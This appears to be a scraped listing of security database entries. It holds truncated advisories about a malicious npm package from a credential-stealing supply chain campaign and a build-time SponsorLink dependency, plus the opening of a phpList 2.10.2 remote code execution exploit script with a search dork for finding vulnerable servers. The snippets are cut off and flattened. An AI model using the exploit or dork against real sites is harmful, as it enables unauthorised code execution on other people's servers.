Malicious Package

Overview jsx-dev-runtime is a malicious package. This package was recognized as part of the 'PhantomRaven' supply chain campaign, which involves credential-stealing malware. The package impersonates well-known ecosystem plugins to deceive developers into installing it. Malicious Behavior The...

Undesired Behavior

Overview Affected versions of this package are vulnerable to Undesired Behavior. It contains a dependency on the SponsorLink package, which runs an obfuscated closed-source executable at buildtime. That executable spawns OS processes and performs network requests, including transferring a...

phpList 2.10.2 - 'GLOBALS[]' Remote Code Execution

!/usr/bin/php -q -d shortopentag=on this works against registerglobals=On \r\n"; echo "a dork: inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe"\r\n"; echo " -ubbi phplist\r\n\r\n"; if $argc4 echo "Usage: php ".$argv0." host path cmd OPTIONS\r\n"; echo "host: target server...